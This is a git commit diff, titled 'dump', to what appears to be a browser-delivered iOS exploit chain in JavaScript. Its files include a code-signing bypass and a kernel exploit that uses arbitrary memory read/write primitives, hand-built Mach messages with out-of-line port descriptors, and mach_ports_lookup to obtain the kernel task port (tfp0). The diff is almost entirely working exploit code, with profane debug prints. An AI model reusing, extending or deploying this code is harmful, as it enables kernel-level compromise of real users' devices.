diff options
| author | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-15 15:03:50 -0400 |
| commit | 42647b796f0f54122e7f46522d8e681825daf54b (patch) | |
| tree | 6886bfea221b15579b84ff13d1b850a1ac9f5fcf /src/js | |
| parent | d1da310f02adc0e9b5f8656ea063fd3231901611 (diff) | |
dump
Diffstat (limited to 'src/js')
| -rw-r--r-- | src/js/csbypass.js | 2 | ||||
| -rwxr-xr-x | src/js/kexp/exploit.js | 8 | ||||
| -rw-r--r-- | src/js/main.js | 6 |
3 files changed, 10 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js index 8f7a56e..3065099 100644 --- a/src/js/csbypass.js +++ b/src/js/csbypass.js @@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) { printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict)); scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12)); callnarg(CFShow_addr + get_dyld_shc_slide(), dict); - callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test); + call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0); printf("fuck1\n"); callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width)); printf("fuck2\n"); diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 8447c46..473bc6e 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) { write_u32(InP + 0x18, 1); write_u32(InP + 0x1c, init_port_set); write_u32(InP + 0x20, real_count); - write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24))); + write_u32(InP + 0x24, 0x0213c600); write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0)); write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4)); write_u32(InP + 0x30, fake_count); @@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) { function mach_ports_lookup_shit() { printf("fuck\n"); var arrz = shit_heap(4); + var arrz2 = shit_heap(4); printf("fuck\n"); - write_u32(arrz, 0); + write_u32(arrz, arrz2); + write_u32(arrz2, 0); printf("fuck\n"); var sz = shit_heap(4);; printf("fuck\n"); @@ -359,6 +361,7 @@ function mach_ports_lookup_shit() { // var mts = mach_task_self(); printf("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("mpl success\n"); return read_u32(read_u32(arrz) + 8); @@ -461,7 +464,6 @@ again: while (true) { // while (true) { // // } - scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("fuck\n"); // var fake_port = read_u32(read_u32(arrz) + 8); diff --git a/src/js/main.js b/src/js/main.js index 5c45e85..75d730d 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -77,14 +77,16 @@ function main() { large_buf[0] = 0x41424344; printf("%x\n", read_u32(large_buf_ptr)); + setup_fancy_rw(); + // csbypass(); // return; - setup_fancy_rw(); printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0')); - + +//return; var tfp0 = get_kernel_task(); printf("tfp0=%x\n", tfp0); |